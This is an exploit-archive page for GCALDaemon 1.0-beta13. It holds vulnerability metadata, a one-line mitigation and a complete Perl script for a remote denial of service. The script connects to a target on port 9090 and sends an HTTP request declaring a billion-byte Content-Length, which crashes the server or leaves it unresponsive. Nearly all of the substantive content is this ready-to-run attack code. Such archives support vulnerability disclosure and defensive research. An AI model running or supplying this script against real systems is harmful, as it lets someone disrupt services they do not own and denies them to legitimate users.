GCALDaemon - exploit.company

vendor:

GCALDaemon

by:

Luca "ikki" Carettoni

7.5

CVSS

HIGH

Remote Denial of Service

CWE

Product Name: GCALDaemon

Affected Version From: 1.0-beta13

Affected Version To: 1.0-beta13

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

GCALDaemon <= 1.0-beta13 Remote DoS

This Perl script exploits a remote denial of service vulnerability in GCALDaemon version 1.0-beta13. By sending a specially crafted HTTP request with a large content length, an attacker can cause the server to crash or become unresponsive.

Mitigation:

Upgrade to a patched version of GCALDaemon.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# /*
#  * GCALDaemon <= 1.0-beta13 Remote DoS 
#  * 
#  * Original Advisory: 
#  * https://www.securityfocus.com/bid/25704/info
#  * http://www.ikkisoft.com/stuff/SN-2007-01.txt
#  *
#  *  Luca "ikki" Carettoni
#  *  http://www.ikkisoft.com
#  */

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, 
PeerProto => 'tcp')
or die "error: $!\n";
print "GCALDaemom DoS Expoit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 1000000000\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";

# milw0rm.com [2007-10-16]